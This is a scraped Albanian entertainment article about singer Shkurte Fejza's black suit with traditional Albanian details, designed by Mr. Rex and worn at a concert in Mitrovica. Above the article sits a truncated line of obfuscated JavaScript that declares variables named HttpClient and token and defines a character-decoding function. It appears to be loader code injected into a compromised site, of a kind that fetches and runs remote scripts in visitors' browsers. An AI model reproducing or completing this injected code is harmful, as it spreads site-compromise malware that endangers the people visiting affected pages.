;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Detaji në veshjen e Shkurte Fejzës që mori vëmendjen e të gjithëve (FOTO)

By

Pa dyshim, një prej përzgjedhjeve më të këndshme në listën e këngëtarëve të ftuar për të performuar në koncertin e Unikkatilit ishte edhe ikona e muzikës popullore, Shkurte Fejza.

Një koncert në zemër të Mitrovicës, me synim bashkimin e të gjithë shqiptarëve nuk do të kishte kuptim pa pjesëmarrjen e Shkurtes e cila ka një jetë që i këndon çështjes shqiptare në përgjithësi e bashkimit të Mitrovicës në veçanti.

Tingujt e saj që jehonin zëshëm kundër synimeve për ndarjen e qytetit të minatorëve ishin shoqëruar edhe me një imazh të kuruar i cili ra në sy.

Këngëtarja kishte zgjedhur të dukej me klas, e veshur në të zeza. Me pantallona dhe sako, Shkurtja ka reflektuar elegancë duke shkëlqyer me pamjen e saj, meritë e dizajnerit Mr. Rex.

Për paraqitjen e këngëtares, dizajneri Mr. Rex kishte menduar gërshetimin me tradicionalen përmes detajeve në  njërën anë të sakos  të cilat reflektojnë kulturën shqiptare e që morën mjaft vëmendje.

Më poshtë, fotografi nga paraqitja tejet dinjitoze e këngëtares Shkurte Fejza. /Prive.al

Artikuj të ngjashëm